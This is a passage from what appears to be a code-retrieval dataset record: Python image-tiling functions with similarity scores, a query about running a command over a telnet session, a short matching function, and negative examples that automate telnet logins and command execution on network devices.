arr.shape[-1], arr.shape[-2]\n tile_w = img_width // x_ntiles\n tile_h = img_height // y_ntiles\n return split_image_into_tiles_of_size(arr, tile_w, tile_h, overlap)", "def __init__(self, tiles):\n self.tiles = tiles", "def load_images(self):\r\n self.standing_frame = [load_image(\"cat1.png\")]\r\n self.walk_frames_r = [load_image(\"cat2.png\"), load_image(\"cat3.png\"),\r\n load_image(\"cat4.png\")]", "def cutTiles(tasksInfo, results, origLocation, destLocation, \\\n completedOnly, nAnswers = 0):\n tmpMosaic = destLocation+\"/tmpMosaic_n\"+str(nAnswers)+\"/\"\n createDir(tmpMosaic)\n\n #Setting info on images\n numberImages = 12\n tmpImg = []\n for i in range(numberImages):\n tmpImg.append(destLocation+\"/tmpImg_n\"+str(i+1).zfill(2)+\"/\")\n createDir(tmpImg[i])\n imgFile = []\n imgFile.append('2011352')\n imgFile.append('2011353')\n imgFile.append('2011355')\n imgFile.append('2011357')\n imgFile.append('2011358')\n imgFile.append('2011359')\n imgFile.append('2011360')\n imgFile.append('2011361')\n imgFile.append('2011362')\n imgFile.append('2011363')\n imgFile.append('2011364')\n imgFile.append('2011365')\n\n #Setting info on image type\n formatFile = \"GTiff\"\n driver = gdal.GetDriverByName(formatFile)\n\n #Open file containing geoinfo on best result and statistical info on all\n if completedOnly == 1:\n f = open(destLocation+'/bestInfo.txt','w')\n #~ fStat = open(destLocation+'/statInfoCompleted.txt','w')\n #~ else:\n #~ fStat = open(destLocation+'/statInfoAll_n'+str(nAnswers)+'.txt','w')\n\n fSelect = open(destLocation+'/selectedTile.txt','w')\n numberTasks = len(tasksInfo)\n print 'tasksInfo: ', len(tasksInfo)\n print 'results: ', len(results)\n for task in range(numberTasks):\n #Checking if the task has the mininum number of answers\n if (sum(results[task]) < nAnswers):\n #If it has not, lets go to the next task\n continue\n #Geting the selected day for each task\n taskId = tasksInfo[task]['taskId']\n definedArea = tasksInfo[task]['area']\n selectedTile = results[task].index(max(results[task]))\n if selectedTile == 0:\n selectedFile = '2011352'\n elif selectedTile == 1:\n selectedFile = '2011353'\n elif selectedTile == 2:\n selectedFile = '2011355'\n elif selectedTile == 3:\n selectedFile = '2011357'\n elif selectedTile == 4:\n selectedFile = '2011358'\n elif selectedTile == 5:\n selectedFile = '2011359'\n elif selectedTile == 6:\n selectedFile = '2011360'\n elif selectedTile == 7:\n selectedFile = '2011361'\n elif selectedTile == 8:\n selectedFile = '2011362'\n elif selectedTile == 9:\n selectedFile = '2011363'\n elif selectedTile == 10:\n selectedFile = '2011364'\n elif selectedTile == 11:\n selectedFile = '2011365'\n print taskId\n print selectedFile\n print definedArea\n fSelect.write(str(taskId)+\" \"+selectedFile+\"\\n\")\n #Printing bestInfo\n if completedOnly == 1:\n f.write(str(definedArea[0])+\" \"+ str(definedArea[1])+\" \"+\\\n str(definedArea[2])+\" \"+str(definedArea[3])+\"\\n\")\n cmd = \"gdal_translate -projwin \"+str(definedArea[0])+\" \"+ \\\n str(definedArea[3])+\" \"+str(definedArea[2])+\" \"+ \\\n str(definedArea[1])+\" \"+origLocation+selectedFile+\".tif \"+ \\\n tmpMosaic+str(taskId)+\".tif\"\n os.system(cmd)\n #Generating image cuts for all images\n for i in range(numberImages):\n cmd = \"gdal_translate -projwin \"+str(definedArea[0])+\" \"+ \\\n str(definedArea[3])+\" \"+str(definedArea[2])+\" \"+ \\\n str(definedArea[1])+\" \"+origLocation+imgFile[i]+\".tif \"+ \\\n tmpImg[i]+str(taskId)+\".tif\"\n os.system(cmd)\n #Changing filename based on the type of result (if all results or\n #completed only.\n if completedOnly == 0:\n if nAnswers == 0:\n fileMosaic = \"mosaicall\"\n else:\n fileMosaic = \"mosaicall\"+\"_n\"+str(nAnswers)\n elif completedOnly == 1:\n if nAnswers == 0:\n fileMosaic = \"mosaiccompleted\"\n else:\n fileMosaic = \"mosaiccompleted\"+\"_n\"+str(nAnswers)\n #Checking if the temporary tile folder is not empty\n if os.listdir(tmpMosaic) == []:\n print \"No output detected for desired parameter N = \" + str(nAnswers)\n #Removing temporary directories\n removeDir(tmpMosaic)\n #Returning error code\n resultCut = 1\n return resultCut\n #Merging the tiles into one mosaic\n cmd = \"gdal_merge.py -init '200 200 200' -o \"+destLocation+fileMosaic+\".tif \"+tmpMosaic+ \\\n \"*.tif\"\n os.system(cmd)\n #Copying file with timestamp\n now = datetime.datetime.now()\n timeCreation = now.strftime(\"%Y-%m-%d_%Hh%M\")\n shutil.copyfile(destLocation+fileMosaic+\".tif\", destLocation+ \\\n fileMosaic+\"_\"+timeCreation+\".tif\")\n #Close file containing geoinfo on best result\n if completedOnly == 1:\n f.close()\n #Close stat file\n #~ fStat.close()\n fSelect.close()\n #Removing temporary directories\n #~ removeDir(tmpMosaic)\n #~ for i in range(numberImg):\n #~ removeDir(tmpImg[i])\n #Final state\n resultCut = 0\n return resultCut", "def create_png_images(self):\n if self.subject is None:\n print Console.WARNING + 'You need to specify a subject first' + Console.ENDC\n return\n\n check_dir_of = self.locations.check_dir_of\n check_dir_of(self.locations.HISTO_PNG_U)\n check_dir_of(self.locations.HISTO_PNG)\n check_dir_of(self.locations.SOURCE_PNG)\n\n\n\n fmap_img = ImageUtils.load_nifti_image(self.locations.HIST_FMAP) #loading subject nifti files\n volumes = []\n try:\n for s in self.locations.SOURCES:\n volumes.append(ImageUtils.load_nifti_image(s))\n except IOError as e:\n print Console.FAIL + 'There are errors loading nifi files for subject %s'%self.subject + Console.ENDC\n return False\n \n\n num_slices = volumes[0].shape[2] #use first volume to check expected number of slices\n\n self.locations.create_empty_dir(self.locations.IMAGES_DIR)\n\n print 'Creating input PNGs for %s'%self.subject\n for k, vol in enumerate(volumes):\n for i in range(num_slices):\n imslice = ImageUtils.data_to_bytescale_rgb(vol[:, :, i])\n im = Image.fromarray(imslice)\n im.save(self.locations.SOURCE_PNG % (self.locations.LABELS[k],i))\n\n \n print 'Creating histology PNGs for %s'%self.subject\n for i in range(num_slices):\n\n im_unscaled = ImageUtils.data_to_unscaled_rgb(fmap_img[:, :, i]); #keeps the original values\n im_unscaled = Image.fromarray(im_unscaled)\n im_unscaled = im_unscaled.filter(ImageFilter.GaussianBlur(radius=2)) #Filter requested by Ali Khan\n im_unscaled.save(self.locations.HISTO_PNG_U % i)\n\n im_scaled = ImageUtils.data_to_bytescale_rgb(fmap_img[:,:,i]); # bytescaled histology\n im_scaled = Image.fromarray(im_scaled)\n im_scaled = im_scaled.filter(ImageFilter.GaussianBlur(radius=2)) #Filter requested by Ali Khan\n im_scaled.save(self.locations.HISTO_PNG % i)\n\n print\n return True", "def prepare_map(self):\n for y, row in enumerate(self.contents):\n for x, tile in enumerate(row):\n bm = self.get_tile(tile)\n self.image[\n y * TILE_SIZE : (y + 1) * TILE_SIZE,\n x * TILE_SIZE : (x + 1) * TILE_SIZE,\n ] = bm", "def Dev_Image_data_generator(folderlist,resize = (920,1200),Transformation = True, scaling = True, batch_size = 16):\n\n while True:\n total_classes = len(folderlist.keys())\n keys = folderlist.keys()\n Images = []\n Image_label = []\n for key in folderlist.keys():\n img_label = random.choice(folderlist[key])\n img = Image.open(img_label,'r')\n h = resize[1]\n l = int(img.size[1]*h/img.size[0])\n img = img.resize((h,l), Image.ANTIALIAS)\n background = Image.new('RGB', (resize[1], resize[0]), (255, 255, 255))\n img_w, img_h = img.size\n bg_w, bg_h = background.size\n offset = (int((bg_w - img_w) / 2), int((bg_h - img_h) / 2))\n background.paste(img, offset)\n background = np.asarray(background)\n if Transformation == True:\n rotation = rotate(background,random.choice(range(360)))\n translate = translate_xy(background,random.choice(range(resize[0]/4)),random.choice(range(resize[1]/4)))\n flip = cv2.flip(rotation,1)\n Y = np.concatenate((rotation[np.newaxis,:,:,:],flip[np.newaxis,:,:,:],translate[np.newaxis,:,:,:]))\n Images.append(Y)\n Images.append(background[np.newaxis,:,:,:])\n Image_label.append([key for i in range(4)])\n else:\n Images.append(background[np.newaxis,:,:,:])\n Image_label.append([key])\n Image_label = np.concatenate(Image_label)\n Images = np.concatenate(Images)\n Image_label = np.array(pd.get_dummies(Image_label))\n X_Image , Y_Image = shuffle(Images,Image_label,random_state=0)\n if scaling == True:\n X_Image = X_Image/255\n else:\n X_Image = X_Image\n batches = int(len(X_Image)/batch_size)\n for batch in range(batches):\n x = X_Image[batch*batch_size:(batch+1)*batch_size,:,:,:]\n y = Y_Image[batch*batch_size:(batch+1)*batch_size]\n yield((x,y))", "def make_layers(self):\n w, h = self.image.get_size()\n shrink = pg.transform.smoothscale(self.image, (w//2, h//2))\n self.mid_image = tools.tile_surface((w,h), shrink, True)\n shrink = pg.transform.smoothscale(self.image, (w//4, h//4))\n self.base = tools.tile_surface(prepare.SCREEN_SIZE, shrink, True)", "def gather_images():\n # Import an empty image\n null_img = Image.open('assests/null/null.png')\n null_img = ImageTk.PhotoImage(null_img.resize((100,100), Image.ANTIALIAS))\n\n # Import image and icon for X\n X_img = Image.open('assests/X_Assets/X.png')\n X_icon = ImageTk.PhotoImage(X_img.resize((15, 12), Image.ANTIALIAS))\n X_img = ImageTk.PhotoImage(X_img.resize((95, 80), Image.ANTIALIAS))\n\n # Import horizontally striked X\n X_hor = Image.open('assests/X_Assets/X_hor.png')\n X_hor = ImageTk.PhotoImage(X_hor.resize((95, 80), Image.ANTIALIAS))\n\n # Import vertically striked X\n X_vert = Image.open('assests/X_Assets/X_vert.png')\n X_vert = ImageTk.PhotoImage(X_vert.resize((95, 80), Image.ANTIALIAS))\n\n # Import diagonally strikedX\n X_diag = Image.open('assests/X_Assets/X_diag.png')\n X_diag = ImageTk.PhotoImage(X_diag.resize((95, 80), Image.ANTIALIAS))\n\n # Import another diagonally striked X\n X_diag2 = Image.open('assests/X_Assets/X_diag2.png')\n X_diag2 = ImageTk.PhotoImage(X_diag2.resize((95, 80), Image.ANTIALIAS))\n\n # Import image and icon for O\n O_img = Image.open('assests/O_Assets/O.png')\n O_icon = ImageTk.PhotoImage(O_img.resize((14, 14), Image.ANTIALIAS))\n O_img = ImageTk.PhotoImage(O_img.resize((90, 90), Image.ANTIALIAS))\n\n # Import horizontally striked O\n O_hor = Image.open('assests/O_Assets/O_hor2.png')\n O_hor = ImageTk.PhotoImage(O_hor.resize((90, 90), Image.ANTIALIAS))\n\n # Import vertically striked O\n O_vert = Image.open('assests/O_Assets/O_vert2.png')\n O_vert = ImageTk.PhotoImage(O_vert.resize((90, 90), Image.ANTIALIAS))\n\n # Import diagonally striked O\n O_diag = Image.open('assests/O_Assets/O_diag.png')\n O_diag = ImageTk.PhotoImage(O_diag.resize((90, 90), Image.ANTIALIAS))\n\n # Import another diagonally striked O\n O_diag2 = Image.open('assests/O_Assets/O_diag2.png')\n O_diag2 = ImageTk.PhotoImage(O_diag2.resize((90, 90), Image.ANTIALIAS))\n\n return (null_img, X_icon, X_img, X_hor, X_vert, X_diag, X_diag2, O_icon, O_img, O_hor, O_vert, O_diag, O_diag2)", "def Valid_Image_data_generator(folderlist,resize = (920,1200),Transformation = True, scaling = True):\n\n while True:\n total_classes = len(folderlist.keys())\n keys = folderlist.keys()\n Images = []\n Image_label = []\n for key in tqdm(folderlist.keys()):\n for j in range(len(folderlist[key])):\n img_label = folderlist[key][j]\n img = Image.open(img_label,'r')\n h = resize[1]\n l = int(img.size[1]*h/img.size[0])\n img = img.resize((h,l), Image.ANTIALIAS)\n background = Image.new('RGB', (resize[1], resize[0]), (255, 255, 255))\n img_w, img_h = img.size\n bg_w, bg_h = background.size\n offset = (int((bg_w - img_w) / 2), int((bg_h - img_h) / 2))\n background.paste(img, offset)\n background = np.asarray(background)\n if Transformation == True:\n rotation = rotate(background,random.choice(range(360)))\n translate = translate_xy(background,random.choice(range(resize[0]/4)),random.choice(range(resize[1]/4)))\n flip = cv2.flip(rotation,1)\n Y = np.concatenate((rotation[np.newaxis,:,:,:],flip[np.newaxis,:,:,:],translate[np.newaxis,:,:,:]))\n Images.append(Y)\n Images.append(background[np.newaxis,:,:,:])\n Image_label.append([key for i in range(4)]) # Four because we are doing rot,trans,flip and one original Image\n else:\n Images.append(background[np.newaxis,:,:,:])\n Image_label.append([key])\n Image_label = np.concatenate(Image_label)\n Images = np.concatenate(Images)\n Image_label = np.array(pd.get_dummies(Image_label))\n X_Image , Y_Image = shuffle(Images,Image_label,random_state=0)\n if scaling == True:\n X_Image = X_Image/255\n else:\n X_Image = X_Image\n return (X_Image,Y_Image)", "def generate_image_grid(sess, op):\n n = 10\n x_points = np.linspace(-20, 20, n)\n y_points = np.linspace(-20, 20, n)\n\n nx, ny = len(x_points), len(y_points)\n plt.subplot()\n gs = gridspec.GridSpec(nx, ny, hspace=0.05, wspace=0.05)\n\n for i, g in enumerate(gs):\n z = np.concatenate(([x_points[int(i / ny)]], [y_points[int(i % nx)]]))\n z = np.reshape(z, (1, 2))\n x = sess.run(op, feed_dict={decoder_input: z})\n ax = plt.subplot(g)\n img = np.array(x.tolist()).reshape(28, 28)\n ax.imshow(img, cmap='gray')\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_aspect('auto')\n plt.show()", "def makeImage(self):\n\n for row in range(self.height):\n self.makeRow(row)\n self.window.update() # display a row of pixels", "def image_generator_not_random(list_of_files, crop_size=320, scale=1):\n while True:\n text_region = []\n for jpgname in list_of_files:\n print jpgname\n # jpgname = np.random.choice(list_of_files)\n img = cv2.imread(jpgname)\n pattern = re.compile('jpg')\n txtname = pattern.sub('txt', jpgname)\n if not os.path.isfile(txtname):\n continue\n cropped_image = img\n with open(txtname, 'r') as f:\n for line in f:\n line_split = line.strip().split(',')\n print line_split\n # clockwise\n (x1, y1, x2, y2) = line_split[0:4]\n (x3, y3, x4, y4) = line_split[4:8]\n text_region.append([string.atof(x1), string.atof(y1), string.atof(x2), string.atof(y2),\n string.atof(x3), string.atof(y3), string.atof(x4), string.atof(y4)])\n if cropped_image is None or text_region is None or \\\n cropped_image.shape[0] != crop_size or cropped_image.shape[1] != crop_size:\n continue\n yield [scale * cropped_image, text_region]", "def generate_images_pred(self, inputs, outputs):\n for scale in self.scales:\n disp = outputs[(\"disp\", scale)]\n disp = F.interpolate(\n disp, [self.height, self.width], mode=\"bilinear\", align_corners=False)\n source_scale = 0\n\n _, depth = disp_to_depth(disp, self.min_depth, self.max_depth)\n\n outputs[(\"depth\", 0, scale)] = depth\n\n for i, frame_id in enumerate(self.frame_ids[1:]):\n\n T = outputs[(\"cam_T_cam\", 0, frame_id)]\n\n # from the authors of https://arxiv.org/abs/1712.00175\n # mean-normalized inverse depth from [62] to discourage shrinking of the estimated depth\n\n axisangle = outputs[(\"axisangle\", 0, frame_id)]\n translation = outputs[(\"translation\", 0, frame_id)]\n\n inv_depth = 1 / depth\n mean_inv_depth = inv_depth.mean(3, True).mean(2, True)\n\n T = transformation_from_parameters(\n axisangle[:, 0], translation[:, 0] * mean_inv_depth[:, 0], frame_id < 0)\n\n cam_points = self.backproject_depth[source_scale](\n depth, inputs[(\"inv_K\", source_scale)])\n pix_coords = self.project_3d[source_scale](\n cam_points, inputs[(\"K\", source_scale)], T)\n\n outputs[(\"sample\", frame_id, scale)] = pix_coords\n\n outputs[(\"color\", frame_id, scale)] = F.grid_sample(\n inputs[(\"color\", frame_id, source_scale)],\n outputs[(\"sample\", frame_id, scale)],\n padding_mode=\"border\")\n\n outputs[(\"color_identity\", frame_id, scale)] = \\\n inputs[(\"color\", frame_id, source_scale)]", "def buildImages(files, targets, type):\n images = []\n for file in files:\n targets.append(file)\n with open(file, \"rb\") as f:\n if type == \"Byte\":\n images.append(bytePlot(list(f.read())))\n elif type == \"Markov\":\n images.append(markovPlot(list(f.read())))\n elif type == \"Hilbert\":\n images.append(hilbertPlot(list(f.read())))\n smp.imsave(\"{}.png\".format(file), images[-1])\n return images, targets", "def tile_image(\n im: Image.Image, width: int, height: int, mode: Optional[str] = \"RGB\", **kwargs: Any\n) -> Image.Image:\n im_out = Image.new(mode, (width, height), **kwargs)\n\n h_tiles = ceil(width / im.width)\n v_tiles = ceil(height / im.height)\n\n for i in range(v_tiles):\n y = im.height * i\n for j in range(h_tiles):\n x = im.width * j\n im_out.paste(im, box=(x, y))\n\n return im_out", "def tiles(self, width: int, height: int) -> TileSet:\n y_count = len(self.tiling)\n for y_index, y_tile in enumerate(self.tiling):\n\n x_count = len(y_tile)\n for x_index, tile_strength in enumerate(y_tile):\n\n # Doing multiplication before devision here to make sure rounding is correct\n bounding_box = (\n # from (x1, y1)\n int(width * x_index / x_count),\n int(height * y_index / y_count),\n # to (x2, y2)\n int(width * (x_index + 1) / x_count),\n int(height * (y_index + 1) / y_count),\n )\n\n yield bounding_box, tile_strength", "def split_tiles(module_data):\n raise NotImplementedError", "def imagePages(files, choice):\n options = [\"Byte\", \"Markov\", \"Hilbert\"]\n type = options[int(ui.prompt(\"Choose a visualization type\", options))]\n\n targets = []\n pageNames = []\n pageSize = 100\n pages = range(math.ceil(len(files)/pageSize))\n for page in pb.progressbar(pages):\n # print(\"\\nPage {}/{}\".format(page+1, len(pages)))\n gc.collect() # Garbage collect\n\n images = []\n start = page*pageSize\n if choice == \"Create\":\n images, targets = buildImages(files[start:start+pageSize], targets, type)\n elif choice == \"Load\":\n images, targets = loadImages(files[start:start+pageSize], targets)\n pageNames.append(\"./pages/images_page{}.npy\".format(page))\n np.save(pageNames[-1], images)\n return targets, pageNames", "def place_images(self, final_list, points):\n\t\tfor i in range(8): \n # Please change this (8) into a class-level variable --KOH\n\t\t\timage_object = final_list[i]\n#\t\tif type(image_object) == 'CorrectImage':\n#\t\t\t\tself.correct = [i, points[i]]\n\t\t\timage = pygame.image.load(image_object.file_path)\n # Why can't these be stored as a property of the class --KOH\n\t\t\timagerect = image.get_rect()\n\t\t\treimage = pygame.transform.scale(image, image_object.size)\n\t\t\tself.screen.blit(reimage, points[i])" ]
[ "0.7096497", "0.7032253", "0.6989992", "0.69054127", "0.6749181", "0.66839963", "0.6649588", "0.65237033", "0.6499432", "0.64959127", "0.6372662", "0.6356276", "0.63422674", "0.63199794", "0.6305179", "0.6302457", "0.62703687", "0.62687695", "0.62687695", "0.62516", "0.6179207", "0.6168577", "0.6159848", "0.6129627", "0.61181986", "0.6105977", "0.6091105", "0.6074418", "0.60719657", "0.60568315", "0.60513705", "0.6046528", "0.60365885", "0.60118324", "0.600736", "0.6005098", "0.59955794", "0.5992382", "0.59850484", "0.59679246", "0.59679246", "0.5922734", "0.59211797", "0.5903535", "0.5903535", "0.5898033", "0.5895544", "0.58765906", "0.5868628", "0.584052", "0.5825845", "0.5806877", "0.5804486", "0.5782672", "0.5781892", "0.5767933", "0.5766237", "0.5763313", "0.57603866", "0.5750455", "0.5747573", "0.5742684", "0.5741854", "0.5741854", "0.5740994", "0.57399106", "0.5738692", "0.5732034", "0.5729177", "0.5721712", "0.57177716", "0.5715239", "0.57124805", "0.57096654", "0.5705561", "0.5701447", "0.5694072", "0.5689481", "0.5687296", "0.5685503", "0.56780404", "0.56694376", "0.5664625", "0.56621623", "0.5658874", "0.5654724", "0.56501424", "0.5646516", "0.5637164", "0.5632967", "0.5624567", "0.56224436", "0.5616289", "0.5615756", "0.56094617", "0.5604453", "0.5601735", "0.5601031", "0.55996126", "0.559681", "0.5592416" ]
0.0
-1
takes a command, telnet session, and a prompt and returns the output of the code
def respond(cmd,t,p): t.write(cmd) return wait(t,p)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def send_telnet_command(command):\n\n tn = telnetlib.Telnet(stb_parameters.STB_IP)\n tn.read_until(bytes(\"login: \", 'UTF-8'))\n tn.write(bytes(stb_parameters.STB_USER_NAME + \"\\n\", 'UTF-8'))\n tn.write(bytes(command + \"\\n\", 'UTF-8'))\n tn.write(bytes(\"exit\\n\", 'UTF-8'))\n result = tn.read_all().decode('ascii')\n return result", "def _execute(self, command):\n \"\"\"\n Confirm the command was correctly echoed back and then ask for\n its return code\n \"\"\"\n self.telnet_client.write((command + \"\\r\\n\").encode())\n resp = self.telnet_client.read_until((command + \"\\r\\n\").encode())\n while True:\n resp = self.telnet_client.read_until(self.prompt.encode())\n if resp is not None:\n break\n\n stdout = resp.decode()\n stderr = \"\"\n self.telnet_client.write(\"echo $?\\r\\n\".encode())\n _, match, _ = self.telnet_client.expect([re.compile(br'(\\d+)')],\n TelnetControl.TELNET_TIMEOUT)\n exit_code = int(match.group(1).decode())\n\n if exit_code != 0:\n stderr = resp.decode()\n return exit_code, stdout, stderr", "def telnet_run(self, cmd_list, prompt_usr='Username:', prompt_pwd='Password:', prompt_ena='>',\n prompt_conf=']', timeout=2, LOGIN_LOG=0):\n prompt_usr = prompt_usr.encode(\"ascii\")\n prompt_pwd = prompt_pwd.encode(\"ascii\")\n prompt_ena = prompt_ena.encode(\"ascii\")\n prompt_conf = prompt_conf.encode(\"ascii\")\n screen_buffer = {'host': self.host}\n log_sleep_time = 1\n output = ''\n try:\n tn = telnetlib.Telnet(self.host, port=23, timeout=1)\n except:\n screen_buffer = 'none'\n result = {'host': self.host, 'conn_type': 'telnet', 'result': 0, 'screen_buffer': screen_buffer}\n return result\n else:\n # login\n # username info\n if LOGIN_LOG:\n # time.sleep(log_sleep_time)\n output = output + tn.read_until(prompt_usr, timeout).decode('ascii')\n else:\n tn.read_until(prompt_usr, timeout)\n tn.write(self.usr.encode(\"ascii\") + b'\\n')\n # password info\n if self.pwd:\n if LOGIN_LOG:\n output = output + tn.read_until(prompt_pwd, timeout).decode('ascii')\n else:\n tn.read_until(prompt_pwd, timeout)\n tn.write(self.pwd.encode(\"ascii\") + b'\\n')\n else:\n tn.read_until(prompt_pwd, timeout)\n tn.write(b'\\n')\n # login info\n if LOGIN_LOG:\n # time.sleep(log_sleep_time)\n output = output + tn.read_until(prompt_ena, timeout).decode('ascii')\n else:\n tn.read_until(prompt_ena, timeout + 1)\n tn.write(b'\\n') # make the first command in prompt\n # run cmd_list\n for cmd in cmd_list:\n tn.write(cmd.encode(\"ascii\") + b'\\n')\n time.sleep(0.5)\n output = output + tn.read_very_eager().decode('ascii')\n # tn.read_until(prompt_conf, timeout)\n\n screen_buffer = output\n tn.close()\n\n result = {'host': self.host, 'conn_type': 'telnet', 'result': 1, 'screen_buffer': screen_buffer}\n return result", "def run_command(self, command):\n # Put the command in a nice byte-encoded variable\n full_command = command.encode('ascii') + b'\\n'\n # Write out the command to telnet\n self.tn.write(full_command)\n # Get the command output, decode it, and split out the junk\n command_output = self.tn.read_until(b'> ').decode('ascii').split('\\r\\n')[:-1]\n # Raise command error if VLC does not recognize the command.\n if command_output != []:\n command_error = re.match(r\"Error in.*\", command_output[0])\n if re.match(\"Unknown command `.*'\\. Type `help' for help\\.\", command_output[0]):\n raise CommandError(\"Unkown Command\")\n elif command_error:\n raise LuaError(command_error.group())\n # Return the split output of the command\n return command_output", "def telnet(shell='/bin/bash'):\n assert(sys.stdin.isatty())\n c.setVerbose(False)\n\n # Open a PTY and spawn a bash connected to the slave end on the remote side\n code = 'import pty; pty.spawn([\\'{}\\', \\'-i\\'])'.format(shell)\n sendline('python -c \"{}\"; exit'.format(code))\n time.sleep(0.5) # No really good way of knowing when the shell has opened on the other side...\n # Should maybe put some more functionality into the inline python code instead.\n\n # Save current TTY settings\n old_settings = termios.tcgetattr(sys.stdin.fileno())\n\n # Put TTY into raw mode\n tty.setraw(sys.stdin)\n\n # Resize remote terminal\n # Nice-to-have: also handle terminal resize\n cols, rows = os.get_terminal_size(sys.stdin.fileno())\n sendline('stty rows {} cols {}; echo READY'.format(rows, cols))\n recvtil('READY\\r\\n') # terminal echo\n recvtil('READY\\r\\n') # command output\n\n interact()\n\n # Restore previous settings\n termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, old_settings)", "async def send_commandTelnet(self, cmd, pattern=None, timeout=None):\n\n # Debug info message\n log.info(\"send_commandTelnet\")\n\n # Default value of timeout variable\n if timeout is None:\n timeout = self.timeout\n\n # Add carriage return at the end of the command (mandatory to send the command)\n cmd = cmd + \"\\n\"\n\n # Sending command\n self._writer.write(cmd.encode())\n\n # Temporary string variable\n output = \"\"\n\n # Temporary bytes variable\n byte_data = b\"\"\n\n try:\n\n # Read data\n while True:\n\n # Read returned prompt\n byte_data += await asyncio.wait_for(\n self._reader.read(MAX_BUFFER_DATA), timeout=timeout\n )\n\n # Display info message\n log.info(f\"send_commandTelnet: byte_data: '{byte_data}'\")\n\n # Temporary convertion in string. This string has the following form: \"b'....'\"\n output = str(byte_data)\n\n # Display info message\n log.info(f\"send_commandTelnet: output: '{output}'\")\n\n # Is a patten used?\n if pattern:\n\n # Use pattern instead of prompt\n if pattern in output:\n\n # Yes\n\n # Leave the loop\n break\n\n else:\n\n # Check if prompt is found\n if self.check_if_prompt_is_found(output):\n\n # Yes\n\n # Leave the loop\n break\n\n except asyncio.TimeoutError:\n\n # Time out during when reading prompt\n\n # Display error message\n log.error(\"send_commandTelnet: connection: timeout\")\n\n # Exception propagation\n raise\n\n except Exception as error:\n\n # Error during when reading prompt\n\n # Display error message\n log.error(f\"send_commandTelnet: error: {error}\")\n\n # Exception propagation\n raise\n\n # Convert data (bytes) into string\n output = byte_data.decode(\"utf-8\", \"ignore\")\n\n # Debug info message\n log.debug(\n f\"send_commandTelnet: raw output: '{output}'\\nsend_commandTelnet: raw output (hex): '{output.encode().hex()}'\"\n )\n\n # Remove the command sent from the result of the command\n output = self.remove_command_in_output(output, str(cmd))\n # Remove the carriage return of the output\n output = self.remove_starting_carriage_return_in_output(output)\n # Remove the ending prompt of the output\n output = self.remove_ending_prompt_in_output(output)\n\n # Debug info message\n log.debug(\n f\"send_commandTelnet: cleaned output: '{output}'\\nsend_commandTelnet: cleaned output (hex): '{output.encode().hex()}'\"\n )\n\n # Check if there is an error in the output string (like \"% Unrecognized command\")\n # and generate an exception if needed\n self.check_error_output(output)\n\n # Return the result of the command\n return output", "def telnet1(node):\n if len(node) == 2:\n # we received env and node name\n env = node[0]\n running = helpers.check_sim_running(env)\n node = node[1]\n elif len(node) == 1:\n # assume default env\n env = \"default\"\n running = helpers.check_sim_running(env)\n node = node[0]\n else:\n exit(call([get_command(), \"telnet\", \"--help\"]))\n\n if running:\n sim_name = running\n server = VIRLServer()\n details = server.get_sim_roster(sim_name)\n\n if node:\n try:\n node_dict = get_node_from_roster(node, details)\n node_name = node_dict.get(\"NodeName\")\n ip = node_dict[\"managementIP\"]\n proxy = node_dict.get(\"managementProxy\")\n\n # use user specified telnet command\n if \"VIRL_TELNET_COMMAND\" in server.config:\n cmd = server.config[\"VIRL_TELNET_COMMAND\"]\n cmd = cmd.format(host=ip)\n print(\"Calling user specified command: {}\".format(cmd))\n exit(call(cmd.split()))\n\n if proxy == \"lxc\":\n lxc = get_mgmt_lxc_ip(details)\n click.secho(\"Attemping telnet connection\" \" to {} at {} via ssh {}\".format(node_name, ip, lxc))\n cmd = 'ssh -t {}@{} \"telnet {}\"'\n cmd = cmd.format(server.user, lxc, ip)\n\n exit(call(cmd, shell=True))\n else:\n # handle the \"flat\" networking case\n click.secho(\"Attemping telnet connection\" \" to {} at {}\".format(node_name, ip))\n exit(call([\"telnet\", ip]))\n\n except AttributeError:\n click.secho(\"Could not find management info \" \"for {}:{}\".format(env, node), fg=\"red\")\n\n except KeyError:\n click.secho(\"Unknown node {}:{}\".format(env, node), fg=\"red\")\n else:\n return details.json()", "def SendCmd(self, command):\r\n if not self.__CheckConnectStatus():\r\n print \"Non telnet connection!\"\r\n return False\r\n\r\n if command == None or command == False:\r\n print \"No valid command to run.\"\r\n return True\r\n else:\r\n command = str(command) + \"\\r\\n\"\r\n print self.prompt + command\r\n \r\n try:\r\n self.tn.read_very_eager() \r\n self.tn.write(command)\r\n p_Output = self.tn.read_until(self.prompt, self.timeout)\r\n print p_Output\r\n return p_Output\r\n\r\n except:\r\n print \"Write command failure\"\r\n return False", "def telnet():\r\n print('''\\n%s at %s acting as user %s\r\n\\nTelnet Service Menu''' % (PACKETMASTER.model, ADDRESS, USERNAME))\r\n choice = moves.input('''\r\n 1 - Get current Telnet status\r\n 2 - Enable or Disable Telnet service\r\n 3 - Back\r\n 4 - Quit \\n\r\n Enter selection number: ''')\r\n try:\r\n choice = int(choice)\r\n except ValueError as reason:\r\n print(\"That is not a valid selection.\", reason)\r\n telnet()\r\n execute = {1: PACKETMASTER.get_telnet,\r\n 2: PACKETMASTER.set_telnet_guided,\r\n 3: hardwareconfig,\r\n 4: exit}\r\n if choice in execute:\r\n try:\r\n select = execute[choice]\r\n run = select()\r\n print(run)\r\n telnet()\r\n except KeyError as reason:\r\n print(reason)\r\n else:\r\n print(\"That is not a valid selection.\")\r\n telnet()", "def run(self, cmdline):\n self.send(cmdline+\"\\n\")\n rdata = '\\n'.join(self.recv_to_prompt())\n return rdata", "def cmd(self, command):\n self.enode.get_shell('bash').send_command(command, matches=self.scapy_prompt)\n response = self.enode.get_shell('bash').get_response()\n return response", "def do_command(command):\n send_command(command)\n response = get_response()\n print(\"Rcvd: <<< \\n\" + response)\n return response", "def telnet(node):\n server = VIRLServer()\n client = get_cml_client(server)\n\n current_lab = get_current_lab()\n if current_lab:\n lab = safe_join_existing_lab(current_lab, client)\n if lab:\n try:\n node_obj = lab.get_node_by_label(node)\n except NodeNotFound:\n click.secho(\"Node {} was not found in lab {}\".format(node, current_lab), fg=\"red\")\n exit(1)\n\n if node_obj.is_active():\n mgmtip = get_node_mgmt_ip(node_obj)\n if mgmtip:\n if \"VIRL_TELNET_COMMAND\" in server.config:\n cmd = server.config[\"VIRL_TELNET_COMMAND\"]\n cmd = cmd.format(host=mgmtip)\n print(\"Calling user specified command: {}\".format(cmd))\n exit(call(cmd.split()))\n else:\n click.secho(\"Attemping telnet connection to {} at {}\".format(node_obj.label, 